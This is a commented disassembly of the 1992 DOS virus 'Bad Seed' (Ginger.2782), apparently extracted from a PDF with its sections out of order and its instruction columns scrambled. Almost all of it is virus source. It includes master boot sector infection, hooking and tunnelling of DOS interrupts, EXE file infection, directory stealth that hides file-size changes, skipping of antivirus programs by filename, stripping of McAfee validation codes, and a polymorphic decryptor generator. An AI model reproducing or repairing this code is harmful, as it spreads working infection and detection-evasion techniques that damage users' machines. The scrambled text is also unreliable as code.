; Adjust the DOS partition ; to have 6 sectors less.

SUB SBB

[DI+12], SI WORD PTR [DI+12+2], 0

; Adjust the partition sector ; count aswell.

Store_Home:

; Virus sectors + old MBS.

INC CX

; Store the MBS on the stolen ; partition sectors.

INC CX

; Write the virusbody to the stolen sectors. MOV MOV

AX, 0300h+Virus_Size_512 BX, 0

INC CX PUSHF CALL JC

; INT 13h. DWORD PTR Old_Int13h Exit_Inf_MBS

; Copy the virus MBS loader into the MBS. MOV MOV MOV CLD REP

SI, OFFSET MBS_Loader DI, OFFSET Buffer CX, (Relocated_Boot-MBS_Loader)

MOV MOV MOV XOR

AX, BX, CX, DH,

PUSHF CALL Exit_Inf_MBS:

MOVSB 0301h OFFSET Buffer 1 DH

; Write the infected MBS ; to disk.

; INT 13h. DWORD PTR Old_Int13h

RETN

New_Int01h: PUSH MOV

BP BP, SP

; Setup a stack pointer.

CMP JE

CS:Tunnel_Success, 1 Clear_TF

; Tunnel already finished? ; *** Pointless code, since ; the TF is already cleared.

CMP = JA

[BP+(2*2)], 1234h WORD PTR $-2 Exit_Int01h

; We're in the DOS kernel?

LES

AX, [BP+(1*2)]

; Get instruction's CS:IP.

MOV MOV

CS:Old_Int13h, AX CS:Old_Int13h+2, ES

; Save it.

MOV

CS:Tunnel_Success, 1

; Mark tunnel successful.

Clear_TF:

AND

[BP+(3*2)], NOT 100h

; Disable the trapflag.

Exit_Int01h:

POP

BP

First_MCB

PUSH PUSH

AX ES

POP ES POP AX

IRET

New_Int13h: CMP JNE

CX, 1 JMP_Old_Int13h

; Track 0, sector 1 ?

CMP JNE

DX, 80h JMP_Old_Int13h

; Head 0, of the 1st HD ?

PUSH PUSH

CMP JA

AH, 03h JMP_Old_Int13h

; Is it a sector write?

CMP JB

AH, 02h JMP_Old_Int13h

; Or a sector read?

AL Read_Orig_MBS

; Only the MBS gets read?

ADD INC

BX, 512 CX

; Next sector in buffer. ; Next sector.

PUSHF CALL

; DWORD PTR CS:Old_Int13h ; ; ;

MOV

AL, 1

; Just the MBS.

MOV MOV

CX, CS:Home_ST DX, CS:Home_HD

; Load address of original ; MBS.

PUSHF CALL

; Read/write the original DWORD PTR CS:Old_Int13h ; MBS.

RETF

2

CX DX DEC JZ

PUSH PUSH

AX BX

Process the other sectors first, so the MBS action can be redirected to the clean one.

POP BX POP AX Read_Orig_MBS:

POP DX POP CX

JMP_Old_Int13h: JMP

New_Int1Ch: PUSH PUSH PUSH PUSH

DWORD PTR CS:Old_Int13h

AX BX ES DS XOR MOV

PUSH POP DS

; Return with flags.

AX, AX ES, AX

; ES = IVT.

LES

BX, ES:[(21h*4)]

; Get INT 21h.

MOV

AX, ES

; AX = segment of INT 21h.

CMP JA

AX, 800h Exit_Int1Ch

; Is it too high? ; Then assume DOS ain't ; loaded yet.

CMP

AX, Old_Int21h+2

; Has the DOS segment

CS

Save_Int21h:

JNE

Save_Int21h

; changed since boot-up?

CMP JE

BX, Old_Int21h Exit_Int1Ch

; Has the DOS offset changed ; since boot-up?

MOV MOV

Old_Int21h, BX Old_Int21h+2, ES

; Save INT 21h.

XOR MOV

AX, AX DS, AX

; DS = IVT.

LES

BX, DWORD PTR CS:Old_Int1Ch

MOV MOV

DS:[(1Ch*4)], BX DS:[(1Ch*4)+2], ES

; Restore original INT 1Ch.

LES

BX, DS:[(13h*4)]

; Get INT 13h.

MOV MOV

CS:Old_Int13h, BX CS:Old_Int13h+2, ES

; Save INT 13h.

; Hook INT 13h. MOV MOV

DS:[(13h*4)], OFFSET New_Int13h_Copy DS:[(13h*4)+2], CS

; Hook INT 21h.

Exit_Int1Ch: POP ES POP BX POP AX

MOV MOV

DS:[(21h*4)], OFFSET New_Int21h DS:[(21h*4)+2], CS

POP

DS

IRET

New_Int21h:

Check_Dir_St:

CMP JB

AH, 11h Check_Dir_St

; Findfirst (FCB) ?

CMP JA

AH, 12h Check_Dir_St

; Findnext (FCB) ?

CALL

FCB_Stealth

; Carry-out the FCB stealth.

RETF

2

; Return with flags.

CMP JB

AH, 4Eh Check_TSR_Test

; Findfirst (dir) ?

CMP JA

AH, 4Fh Check_TSR_Test

; Findnext (dir) ?

CALL

Dir_Stealth

; Carry-out the dir stealth.

RETF

2

; Return with flags.

AX, 0FE02h Check_Message

; Virus' residency check?

Check_TSR_Test: CMP JNE

NOT

AX

IRET Check_Message:

; Return TSR mark. ; Return to the caller.

CMP JNE

AX, 0FE03h Check_Exec

; Call to display message?

CMP JNZ

CS:Infect_Year, 0 JMP_Old_Int21h

; The date was correct? ; Else just ignore the call.

CALL

Display_Message

IRET Check_Exec:

Init_Stack:

PUSH POP SS

CMP JE

AX, 4B00h Init_Stack

; Program execute?

CMP JNE

AH, 4Ch JMP_Old_Int21h

; Program terminate?

MOV MOV

CS:Old_SP, SP CS:Old_SS, SS

; Save the current stack.

CLI CS MOV STI

SP, OFFSET Validate_Header+128

CMP JNE

AH, 4Ch Do_Infect_File

CALL

Check_Activate

JMP

Restore_Stack

Do_Infect_File: CALL Restore_Stack:

; Setup own stack.

; Was it program terminate?

Infect_File

CLI MOV MOV STI

SS, CS:Old_SS SP, CS:Old_SP

JMP

$+2

; *** Pointless instruction.

CS:Int_Count

; Update random counter.

JMP_Old_Int21h: INC

; Restore the original stack.

JMP

DWORD PTR CS:Old_Int21h

MOV IRET

AL, 03h

; Fail operation.

AH, 2Fh Do_Old_Int21h

; Get current DTA.

New_Int24h:

FCB_Stealth: PUSH PUSH

BX ES

PUSH

AX MOV CALL

POP AX PUSHF CALL

PUSH

Get_FCB_Time:

; Execute the call. DWORD PTR CS:Old_Int21h

PUSHF AX CMP JE

AL, -1 Exit_FCB_St

; Error? ; Then get out.

CMP JNE

ES:[BX.FCB_Drive], -1 Get_FCB_Time

; Is it an extended FCB ?

ADD

BX, 7

; Then skip extended stuff.

MOV

AL, BYTE PTR ES:[BX.FCB_Time]

AND

AL, 00011111b

; Mask-out seconds value.

CMP JNE

AL, (62/2) Exit_FCB_St

; File is infected?

; Restore the original filesize.

Exit_FCB_St:

SUB SBB

ES:[BX.FCB_Size], Virus_Size ES:[BX.FCB_Size+2], 0

POP POPF

AX

POP ES POP BX RETN

Dir_Stealth: PUSH PUSH

BX ES

PUSH

AX MOV CALL

AH, 2Fh Do_Old_Int21h

; Get current DTA.

PUSHF CALL

DWORD PTR CS:Old_Int21h

PUSHF AX JC

Exit_Dir_St

MOV

AL, BYTE PTR ES:[BX.Dir_Time]

AND

AL, 00011111b

; Mask-out seconds value.

CMP JNE

AL, (62/2) Exit_Dir_St

; File is infected?

POP AX

PUSH

; Execute the call.

; Get out if error.

; Restore original filesize.

Exit_Dir_St:

SUB SBB

ES:[BX.Dir_Size], Virus_Size ES:[BX.Dir_Size+2], 0

POP POPF

AX

MOV JMP

AH, 40h Do_Read_Write

; Write to file.

MOV CALL JC

AH, 3Fh Load_BX_Int21h Exit_Re_Wr

; Read from file.

SUB

AX, CX

; Set's CF if not all bytes ; were read.

CX, CX DX, DX AX, 4202h Load_BX_Int21h

; Seeks to end of file.

CX, DX, AX, BX,

; Seeks to begin of file.

POP ES POP BX RETN

Write_File:

Read_File: Do_Read_Write:

Exit_Re_Wr:

; If error then exit with CF.

RETN

Seek_EOF:

Seek_EOF_Rel:

XOR XOR MOV JMP

; Seeks EOF relative.

Seek_BOF: XOR XOR MOV Load_BX_Int21h: MOV Do_Old_Int21h:

CLI PUSHF CALL

CX DX 4200h CS:File_Handle

; Load the filehandle. ; Do the DOS call.

DWORD PTR CS:Old_Int21h

RETN

Infect_File: PUSH PUSH PUSH PUSH PUSH PUSH PUSH PUSH

AX BX CX DX SI DI ES DS CALL JNC

Check_File_Name Init_Infect

JMP

Exit_Infect

; Filename can't contain 'SC' ; or a 'V'.

Init_Infect: PUSH PUSH POP DS

PUSH DS

DX

CS

MOV CALL

AX, 3524h Do_Old_Int21h

; Get INT 24h.

MOV MOV

Old_Int24h, BX Old_Int24h+2, ES

; Save it.

MOV MOV CALL

AX, 2524h DX, OFFSET New_Int24h Do_Old_Int21h

; Install own INT 24h.

POP

DS

; File path.

MOV CALL

AX, 4300h Do_Old_Int21h

; Get file's attributes.

MOV

CS:Old_Attr, CX

; Save attributes.

JNC

Blank_Attr

DB

0E9h, 7Eh, 0

POP DX

; * JMP Restore_Int24h * Blank_Attr:

MOV XOR CALL JC

AX, 4301h CX, CX Do_Old_Int21h Restore_Int24h

; Blank file attributes.

MOV CALL JC

AX, 3D02h Do_Old_Int21h Restore_Attr

; Open the file read/write.

MOV

File_Handle, AX

; Save the filehandle.

MOV CALL JC

AX, 5700h Load_BX_Int21h Restore_Date

; Get file's date & time.

MOV MOV

Old_File_Date, DX Old_File_Time, CX

; Save them.

CALL

Seek_BOF

; Seek to the start of the ; file. *** file pointer is ; already at BOF.

MOV MOV CALL JC

DX, OFFSET Header CX, 28 Read_File Restore_Date

; Read the file's header. ; *** Reading in more than ; needed.

PUSH PUSH

DX DS

PUSH POP DS

CS

PUSH POP ES

DS

MOV MOV

DI, OFFSET Check_Activate CX, 32

CMP JNE

Header.EXE_ID, 'ZM' Restore_Date

; It's an .EXE-file? ; If not, abort infect.

MOV CLD REPNE JNE

AX, Header.Checksum

; See if the checksum matches ; a semi-random word in the ; viruscode.

OR

Old_File_Time, (62/2)

JMP

Restore_Date

Check_Validate: CALL JC

Restore_Date:

SCASW Check_Validate

; *** Infected files already ; have 62 seconds.

Remove_Validate Restore_Date

; Remove McAfee validation ; shit.

CALL

Add_Virus

; Add the virus to the file.

MOV MOV MOV CALL

AX, 5701h DX, Old_File_Date CX, Old_File_Time Load_BX_Int21h

; Restore file's date & time.

MOV CALL

AH, 3Eh Load_BX_Int21h

; Close the file.

POP

DS

; File path.

MOV MOV CALL

AX, 4301h CX, CS:Old_Attr Do_Old_Int21h

; Restore file's original ; attributes.

POP DX Restore_Attr:

Restore_Int24h: MOV LDS CALL

AX, 2524h ; Restore original INT 24h. DX, DWORD PTR CS:Old_Int24h Do_Old_Int21h

Exit_Infect: POP ES POP DI POP SI POP DX POP CX POP BX POP AX

DS

POP

RETN

; Returns CF when the filename holds 'SC' or a 'V', this includes most ; anti-virus programs, SCAN, TBSCAN, VIRSCAN, CPAV, NAV, IBMAV, etc. Check_File_Name: PUSH DS POP ES MOV MOV

DI, DX CX, -1

; Find the end of the string.

Find_SCan:

XOR CLD REPNE

AL, AL

NOT

CX

MOV

DI, DX

MOV

AX, 'CS'

MOV

SI, CX

SCASW JE

Bad_File_Name

; Found 'SC' ? ; Then bail.

DEC

DI

; We're doing bytes.

LOOP

Find_SCan

MOV MOV MOV REPNE JE

CX, SI DI, DX AL, 'V' SCASB Bad_File_Name

SCASB ; CX = length of entire path.

; 'SC'.

; Search for a 'V'.

; *** It would have been better if only the filename ; was searched instead of the entire path. Good_File_Name: CLC

; Filename is OK.

RETN Bad_File_Name:

STC

; Filename ain't OK!

RETN

; Removes a possible McAfee validation code from the file. Remove_Validate: MOV CX, -1 ; Seek to the last 10 bytes. MOV DX, -10 CALL Seek_EOF_Rel MOV MOV CALL JC

DX, OFFSET Validate_Header CX, 8 Read_File Exit_Remove_Va

CMP JNE

Validate_Header, 0FDF0h ; Check for the signature. Not_Protected

CMP JNE

Validate_Header+2, 0AAC5h Not_Protected

MOV MOV CALL

CX, -1 DX, -9 Seek_EOF_Rel

; Seek to the last 9 bytes.

; Trash signature. MOV MOV CALL

; Read 8 from there.

DX, OFFSET Validate_Header+6 CX, 4 Write_File

Exit_Remove_Va: RETN Not_Protected:

CLC

RETN

Add_Virus:

Calc_Hdr_Size:

CALL

Seek_EOF

MOV MOV

SI, AX DI, DX

MOV

BX, OFFSET Header

MOV MUL

AX, [BX.File_512_Pages] ; Calculate 512-byte pages Word_512 ; of the file.

SUB SBB JNC

AX, SI DX, DI Calc_Hdr_Size

JMP

Exit_Add_Virus

MOV MUL

AX, [BX.Header_Size] Word_16

; Calculate headersize.

SUB SBB

SI, AX DI, DX

; DI:SI = imagesize.

MOV MOV ADD

AX, [BX.Program_SS] Host_SS, AX Host_SS, (256/16)

; Save file's original SS.

MUL

Word_16

; DX:AX = SS in bytes.

ADD

AX, [BX.Program_SP]

; Plus SP value. ; *** Missing a ADC DX, 0.

SUB SBB JC

AX, SI DX, DI Save_CS

; Stack points inside the ; program image?

SUB SBB JC

AX, 128 DX, 0 Exit_Add_Virus

; Original program must have ; atleast 128 bytes of stack. ; Else get out.

; DI:SI = old filesize.

; Physical size exceeds image ; size? Then it's usually an ; overlay, so bug out.

; Add PSP size.

; Adjust the stack so the viruscode ; doesn't get overwritten.

Save_CS:

ADD

[BX.Program_SS], (Virus_Size+15)/16

MOV ADD

AX, [BX.Program_CS] AX, (256/16)

; Old CS. ; Add size of PSP.

MOV

Host_CS, AX

; Save CS.

MOV MOV

AX, [BX.Program_IP] Host_IP, AX

; Save IP.

CALL

Seek_EOF

ADD ADC

AX, Virus_Size DX, 0

; Calculate size after ; infection.

DIV

Word_512

; Calculate imagesize.

INC

AX

; Round upwards.

; Set new imagesize. MOV MOV

Header.File_512_Pages, AX Header.Image_Mod_512, DX

MOV MOV DIV

DX, DI AX, SI Word_16

; DI:SI = old imagesize.

MOV

Header.Program_CS, AX

; Set new CS.

MOV

BX, DX

; BX = new IP.

ADD MOV

DX, OFFSET Decryptor Header.Program_IP, DX

; Set new IP.

CALL JC

Poly_Engine Exit_Add_Virus

; Add a polymorphic virus ; copy to the host.

OR

Old_File_Time, (62/2)

; Mark the file as infected ; by setting the second value ; to an invalid setting.

MOV AND SHL

BX, Int_Count BX, 00011111b BX, 1

; Random counter. ; 0 - 31. ; MUL 2 (for word index).

; Calculate new CS:IP.

; Put a semi-random word from the viruscode in the ; header's checksum field to mark the infection. MOV MOV

AX, [(Check_Activate-START)+BX] Header.Checksum, AX

CALL

Seek_BOF

MOV MOV CALL

CX, 28 DX, OFFSET Header Write_File

; Write the updated header ; to the target.

Exit_Add_Virus: RETN

; ; ; ;

The decryptors being generated are quite simple, they are effectively enough against pure signature scanners, though can be found with a simple algorithmic approach. A pecularity is that the decryptors use themselves as a key, which drastically complicates debugging.

Poly_Engine: PUSH

BP XOR INT

AH, AH 1Ah

MOV MOV

AX, DX BP, DX

; Get BIOS tick count.

; BP is used as a pointer to ; random data.

PUSH POP ES

DS

MOV MOV MOV CLD REP

DI, OFFSET Decryptor SI, DI CX, (64/2)

; Fill the decryptor area ; with a random word.

XOR MOV

DX, DX ES, DX

; Zero ES.

CALL CALL CALL

Make_Load_DS Make_Load_Ptr Make_Decr_Loop

; Construct the decryptor.

MOV

BYTE PTR [SI], 0E9h

; JMP 16-bit displacement.

MOV SUB SUB

DI, OFFSET Init_Virus DI, SI DI, 3

; Calculate displacement ; to Init_Virus.

MOV

[SI], DI

; Set displacement.

MOV CALL

AX, OFFSET Append_Body_Encrypted_Copy AX

DEC

BP

TEST JNZ

BYTE PTR ES:[BP], 00000010b Make_Load_DS_2

STOSW

INC SI

POP BP RETN

Make_Load_DS:

Make_Load_DS_1: MOV INC SI

; Adjust random pointer. ; *** Not needed as this is ; the first reference to it. ; Test a random bit.

BYTE PTR [SI], 0Eh

; PUSH CS

CALL

Add_Junk

; Add a garbage instruction.

MOV

BYTE PTR [SI], 1Fh

; POP DS

CALL

Add_Junk

INC SI

RETN Make_Load_DS_2: MOV INC SI INC SI

INC SI INC SI

[SI], 0CB8Ch

CALL

Add_Junk

MOV

[SI], 0DB8Eh

; MOV BX, CS

; MOV DS, BX

CALL

Add_Junk

AND

CH, 11111110b

TEST JZ

BYTE PTR ES:[BP], 00000010b Make_MOV_BX

OR

CH, 00000001b

; SI is start code.

MOV

BYTE PTR [SI], 0BEh

; MOV SI, xxxx

MOV INC

[SI], BX SI

; Start virus in CS or ; start decryptor in CS.

CALL

Add_Junk

ADD

BX, OFFSET Decryptor

TEST JZ

CH, 00000001b Make_Counter

; BX is start code?

MOV

BYTE PTR [SI], 0BBh

; MOV BX, xxxx

MOV INC

[SI], BX SI

; Start virus in CS or ; start decryptor in CS.

CALL

Add_Junk

ADD

BX, OFFSET Decryptor

TEST JZ

CH, 00000001b Make_MOV_SI

; BX is start code? ; Then use SI as start ; decryptor.

SUB

BX, OFFSET Decryptor

; Restore BX to virus offset.

CALL

Add_Junk

RETN

Make_Load_Ptr: ; BX is start code. ; *** CX is already zero.

DEC BP

Make_MOV_SI: INC SI

INC SI

Make_MOV_BX: INC SI

INC SI

Make_Counter:

; CX is always the counter register. MOV

BYTE PTR [SI], 0B9h

MOV

AX, OFFSET Decryptor

MOV

[SI], AX

CALL CALL

Add_Junk Add_Junk

; MOV CX, xxxx

INC SI

INC SI INC SI

; Size of encrypted code.

RETN

Make_Decr_Loop: MOV MOV

AH, 14h DH, 17h

; DL, [SI] ; DL, [BX]

TEST JZ

CH, 00000001b Make_Load_Byte

; BX is start of code? ; Yeah.

XCHG

AH, DH

; Else SI is.

DI, SI

; Save start decrypt in DI.

MOV

AL, 8Ah

; MOV reg8

MOV

[SI], AX

; MOV DL, [SI]/[BX]

CALL

Add_Junk

XOR

DL, DL

Make_Load_Byte: MOV

INC SI INC SI

; ADD BYTE PTR

; Initialize the encryptor. MOV BYTE PTR DS:[Append_Body_Encrypted_Copy+(EncryptorAppend_Body_Encrypted)], 28h ; SUB BYTE PTR DEC BP TEST JZ

BYTE PTR ES:[BP], 00000010b Store_Decrypt

MOV

DL, 30h

; XOR BYTE PTR

; Initialize the encryptor. MOV BYTE PTR DS:[Append_Body_Encrypted_Copy+(EncryptorAppend_Body_Encrypted)], DL Store_Decrypt: INC SI INC SI

MOV

[SI], DX

; Store decrypt instruction.

MOV

[SI], 4346h

; INC SI / INC BX

CALL

Add_Junk

MOV MOV

AX, 0FE81h CL, 0BEh

; CMP SI, xxxx ; MOV SI, xxxx

TEST JZ

CH, 00000001b Make_CMP_End

; BX is start of code? ; Yip-yip.

MOV MOV

AH, 0FBh CL, 0BBh

; CMP BX, xxxx ; MOV BX, xxxx

MOV

[SI], AX

; Make CMP end_decryptor.

INC SI INC SI

Make_CMP_End: INC SI INC SI

PUSH

BX ADD

BX, 64

; Offset decryptor + fixed ; size of decryptor.

MOV

[SI], BX

; (end of decryptor).

POP

BX

; Start of code.

MOV

BYTE PTR [SI], 72h

; JB xx

MOV

DX, SI

; DX = displacement patch ; offset.

CALL

Add_Junk

MOV

[SI], CL

; MOV BX/SI, xxxx

MOV

[SI], BX

; Start decryptor.

MOV SUB

AX, SI AX, DX

; Calculate displacement ; between DX and SI.

MOV MOV

BX, DX [BX], AL

; JB displacement offset. ; Patch it.

CALL CALL

Add_Junk Add_Junk

MOV

BYTE PTR [SI], 0E2h

; LOOP xx

SUB DEC

DI, SI DI

; Displacement between here ; and start decrypt loop.

MOV

AX, DI

MOV

[SI], AL

CALL

Add_Junk

TEST JZ

BYTE PTR ES:[BP], 00001111b Exit_Add_Junk

MOV

AL, ES:[BP]

INC SI INC SI

INC SI

INC SI

INC SI

INC SI INC SI

DEC AX

INC SI

; Store displacement.

INC SI

RETN

Add_Junk: DEC BP

DEC BP

TEST JZ

AL, 00000010b Junk_CMP

TEST JZ

AL, 00000100b Junk_TEST

TEST JZ

AL, 00001000b Junk_NOP

MOV

[SI], 0C789h

JMP

Exit_Add_Junk

MOV

BYTE PTR [SI], 90h

JMP

Exit_Add_Junk

Junk_TEST:

MOV

AL, 85h

Make_Operand:

DEC MOV

BP AH, ES:[BP]

TEST JZ

AH, 00000010b Set_reg_reg

DEC

AL

; r16 -> r8.

OR

AH, 11000000b

; reg/reg operation.

MOV

[SI], AX

; Store junk instruction.

JMP

Exit_Add_Junk

DEC

BP

TEST JZ

BYTE PTR ES:[BP], 00000010b Junk_CLD

MOV JMP

AL, 39h Make_Operand

; CMP r16, r16

Junk_CLD: INC SI

MOV

BYTE PTR [SI], 0FCh

; CLD

Exit_Add_Junk:

RETN

; MOV DI, AX

INC SI INC SI

Junk_NOP: INC SI

Set_reg_reg:

; NOP

; TEST r16

INC SI INC SI

Junk_CMP:

Append_Body_Encrypted: CALL

Crypt_Virus

MOV MOV MOV MOV

AH, BX, DX, CX,

PUSHF CALL

DWORD PTR Old_Int21h

40h File_Handle 0 Virus_Size

Crypt_Loop:

JC

Crypt_Loop

SUB

AX, CX

PUSHF

CMP byte ptr ds:Append_Body_Encrypted_Copy+(EncryptorAppend_Body_Encrypted), 28h ; SUB JNE Do_Crypt_Virus MOV byte ptr ds:Append_Body_Encrypted_Copy+(EncryptorAppend_Body_Encrypted), 0 Do_Crypt_Virus: CALL Crypt_Virus POPF RETN

Crypt_Virus: MOV MOV MOV

BX, 0 SI, OFFSET Decryptor CX, OFFSET Decryptor

Crypt_Byte:

MOV

DL, [SI]

; Get key from the decryptor.

XOR =

[BX], DL BYTE PTR $-2

; Encrypt/decrypt byte.

Encryptor

INC

SI

CMP JB

SI, OFFSET Old_Int13h Loop_Crypt_B

MOV

SI, OFFSET Decryptor

LOOP

Crypt_Byte

PUSH

CS

TEST

CL, BL

POP

DS

MOV

BX, 0

TEST

SP, AX

MOV

SI, OFFSET Decryptor

INC BX

Loop_Crypt_B: RETN

Decryptor:

; Load DS with CS.

; Decryptor pointer.

CLD TEST

CH, BL

MOV

CX, OFFSET Decryptor

TEST

AX, CX

; Count to decrypt.

Decrypt_Byte:

MOV

DL, [SI]

DB

039h, 0D8h

; Get the key from the ; decryptor.

; * CMP AX, BX * XOR

[BX], DL

; Decrypt byte.

INC INC

SI BX

; Update code & decryptor ; pointers.

CMP JB

SI, OFFSET Old_Int13h Decrypt_Loop

; Completely ran over the ; decryptor?

MOV

SI, OFFSET Decryptor

; Then reload the pointer.

Decrypt_Byte

; Decrypt all bytes.

JMP

Init_Virus

; Jump to the real start.

ORG

Decryptor+64

; Pad decryptor size.

DW

0, 0

DW DW DW DW DW DW DW DW DW DW

0 0 0 0 0 0 0, 0 0, 0 0, 0 0

DB

(New_Int1Ch-New_Int13h) DUP(0)

NOP

NOP

Decrypt_Loop:

NOP LOOP CLD

Old_Int13h End_Body: Buffer: File_Handle Old_SP Old_SS Old_Attr Old_File_Date Old_File_Time Old_Int1Ch Old_Int21h Old_Int24h Int_Count New_Int13h_Copy:

Append_Body_Encrypted_Copy:

Header

DB

(Decryptor-Append_Body_Encrypted) DUP(0)

DW

14 DUP(0)

Validate_Header DW ORG End_Heap:

4 DUP(0) Buffer+512

Carrier: MOV INT

AX, 4C00h 21h

EXE_Header EXE_ID Image_Mod_512 File_512_Pages Reloc_Items Header_Size Min_Size_Mem Max_Size_Mem Program_SS Program_SP Checksum Program_IP Program_CS Reloc_Table EXE_Header

STRUC DW DW DW DW DW DW DW DW DW DW DW DW DW ENDS

0 0 0 0 0 0 0 0 0 0 0 0 0

Find_FN_FCB FCB_Drive FCB_Name FCB_Ext FCB_Attr FCB_Reserved FCB_Time FCB_Date FCB_Start_Clust FCB_Size Find_FN_FCB

STRUC DB DB DB DB DB DW DW DW DW ENDS

0 8 DUP(0) 3 DUP(0) 0 10 DUP(0) 0 0 0 0, 0

Find_FN_Dir Dir_Reserved Dir_Attr Dir_Time Dir_Date Dir_Size Dir_Name Find_FN_Dir

STRUC DB DB DW DW DW DB ENDS

21 DUP(0) 0 0 0 0, 0 13 DUP(0)

END

Init_Virus

; ; ; ; ; ;

Bad Seed (Ginger.2782) disasm. Multipartite full-stealth MBS/COM/EXE. Quite a good virus for it's time (1992), yet the coding style could be made more compact, and it's buggy aswell. Bugs marked with '***'. T-2000/IR, February 2000 - September 2000.

Virus_Size Virus_Size_512 Virus_Size_1024 COM EXE Boot File

.MODEL .CODE

TINY

EQU EQU EQU EQU EQU EQU EQU

(End_Body-START) ((End_Body-START)+511)/512 3 1 0 0 1

CALL

File_Entry

START:

Boot_Loader:

; *** This code assumes DS = 0, which ; does not necessarly have to be the case. ; Restore original word that was temporary ; replaced with the 55AAh bootmarker.

Original_Word

MOV =

WORD PTR DS:[7C00h+510], 0 WORD PTR $-2

; Steal 3k of DOS memory to hide the virus in. SUB

WORD PTR DS:[413h], Virus_Size_1024

INT

12h

; Get new DOS memory size.

MOV SHL

CL, 6 AX, CL

; Calculate segment where to ; hide.

MOV

ES, AX

; ES = virus segment.

; Read rest of virusbody off disk. MOV MOV MOV INT

AX, 0200h+(Virus_Size_512-1) BX, 512+3 CX, 3 13h

MOV XOR CLD STOSB

AL, 0E8h DI, DI

MOV STOSW

AX, (File_Entry-Boot_Loader)

MOV MOV REP

CX, (512/2) SI, 7C00h MOVSW

; Initialize some variables.

; CALL xxxx opcode. ; A call to the entrypoint ; for file infections.

; Copy virus bootsector ; too to virus segment.

PUSH

MOV MOV MOV MOV

ES:Ofs_Old_Int13h, OFFSET Old_Int13h ES:Ofs_Real_Int13h, OFFSET Real_Int13h ES:Origin, Boot ES:File_Handle, 0

MOV

SI, OFFSET Hook_Ints

PUSH SI

ES

MOV MOV MOV

AX, OFFSET Boot_Int21h SI, OFFSET Boot_Loader DI, OFFSET Old_Int08h

; Relocated virus code.

NOP RETF

; Jump to relocated code.

EXE_Data: EXE_SP EXE_SS EXE_IP EXE_CS

DW DW DW DW

0 0 0 0

DB

'You can''t catch the Gingerbread Man!!'

XCHG

BP, AX

; Save AX (FCB-status) in BP.

POP

SI

; POP delta offset.

PUSH DS

ES

; Save ES & DS (PSP).

MOV INT

AX, 0EEE7h 21h

; See if virus is already ; TSR.

CMP JE

AX, 0D703h JMP_Run_Host

; It is? ; Then bail to host.

MOV

ES, ES:[2Ch]

; Environment block.

CLD XOR

DI, DI

PUSH

SI

File_Entry:

PUSH PUSH POP DS

Find_ComSpec:

CS

; Scan for COMSPEC= to find the command interpreter. ADD MOV REPE

SI, (ComSpec_String-Boot_Loader) CX, 8 CMPSB

PUSHF CALL

Get_End_DI

; Go to the next setting.

POPF JE

Save_ComSpec

; Yeah got it..

POP SI

JMP_Run_Host: DB

JNE

Find_ComSpec

JMP

Run_Host

; Repeat the search.

'Bad Seed - Made in OZ'

Save_ComSpec: PUSH POP DS POP ES

PUSH ES

DS

; Swap DS & ES.

XCHG

SI, DI

; SI = end of path to command ; interpreter.

STD LODSW

Copy_ComSpec:

; SI = last byte of path to ; command interpreter.

MOV DEC

CX, SI CX

; Remember end offset. ; Exclude the '\'.

ADD

DI, 12

; ; ; ;

CMP JNE

AL, '\' Copy_ComSpec

; Copied entire filename? ; Otherwise just go on.

SUB

CX, SI

; Get the size of the command ; interpreter filename.

DI = end of ComSpec_Value. *** Buffer is 1 byte too small, now filenames with 8 characters will fuck up.

LODSB STOSB

POP SI PUSH POP DS

CS

; Keep it for later use.

PUSH

MOV

[SI+(ComSpec_Length-Boot_Loader)], CL

MOV

BYTE PTR [SI+(Origin-Boot_Loader)], File

XOR MOV

AX, AX ES, AX

; ES = IVT.

SI ; Copy the stealth code to an unused piece ; of memory (only used during bootup). ADD MOV MOV CLD REP

SI, (File_Int21h-Boot_Loader) DI, 600h CX, (End_Body-File_Int21h)

MOV

DS, CX

MOVSB

POP SI ; DS = IVT.

; Patch appropriate offsets.

Hook_Ints:

MOV MOV

DS:600h+(Ofs_Old_Int13h-File_Int21h), 600h+(Old_Int13h-File_Int21h) DS:600h+(Ofs_Real_Int13h-File_Int21h), 600h+(Real_Int13h-File_Int21h)

MOV

AX, 600h

; INT 21h ISR to hook up.

CLI ; Starting from a bootsector or file? CMP JNE

BYTE PTR CS:[SI+(Origin-Boot_Loader)], Boot Hook_Int21h

MOV XCHG STOSW

AX, OFFSET New_Int08h DS:[(08h*4)], AX

MOV XCHG STOSW

AX, CS DS:[(08h*4)+2], AX

MOV

DS:[(21h*4)+2], 0FFFFh

; Hook INT 08h.

; ; ; ;

Initialize DOS segment to a dummy value so the virus can determine when DOS has been loaded.

STI

Hook_Int21h:

ADD JMP

DI, (Old_Int13h-(Old_Int08h+4)) SHORT Init_Tunnel_13

XCHG STOSW

DS:[(21h*4)], AX

; Hook INT 21h.

XCHG

BX, AX

; Save original INT 21h.

MOV XCHG STOSW

AX, ES DS:[(21h*4)+2], AX

XCHG STOSW

BX, AX

XCHG STOSW

BX, AX

; Store original INT 21h ; another time.

; Hook INT 01h for recursive tunneling. LEA XCHG STOSW

AX, CS:[SI+(New_Int01h-Boot_Loader)] DS:[(01h*4)], AX

MOV XCHG STOSW

AX, CS DS:[(01h*4)+2], AX

STI Init_Tunnel_13: CLC PUSH Save_Int13h:

; Save INT 13h, then tunnel ; INT 13h.

ES PUSH

DS

LDS

BX, DS:[(13h*4)]

; Get (tunneled) INT 13h.

MOV STOSW

AX, BX

; Save (tunneled) INT 13h.

MOV STOSW

AX, DS

JC

Pick_i13h_ISR

; Already tunneled INT 13h ?

PUSH

DS

; ES:BX = INT 13h.

PUSHF PUSH CALL

CS Tunnel_Int13h

; Recursively tunnel INT 13h ; if origin is file, else ; just save INT 13h.

STC JC

Save_Int13h

; Set flag to only save ; INT 13h.

POP

DS

POP ES

POP DS POP ES

Pick_i13h_ISR: PUSH

SI CMP

BYTE PTR CS:[SI+(Origin-Boot_Loader)], Boot

PUSHF ; Stealth ISR. MOV

SI, 600h+(Boot_Int13h-File_Int21h)

JNE

Hook_Int13h

; Stealth/infection ISR.

Hook_Int13h:

MOV

SI, OFFSET Boot_Int13h

CLI MOV MOV STI

DS:[(13h*4)], SI DS:[(13h*4)+2], ES

; Hook the virus up.

POPF POP SI PUSH POP DS

CS

JE

Run_Old_Boot

; Pass control to real BS.

; If running from a file then go infect the MBS. PUSH

ES

PUSH POP ES

CS

MOV LEA MOV MOV INT

AX, BX, CX, DX, 03h

0201h ; Read the MBS of HDD 1. CS:[SI+(Buffer-Boot_Loader)] 1 80h

JNC

Scan_Part_Tbl

; Go on if no error.

JMP

SHORT Swap_Boot_ID

; Error, bail.

Scan_Part_Tbl:

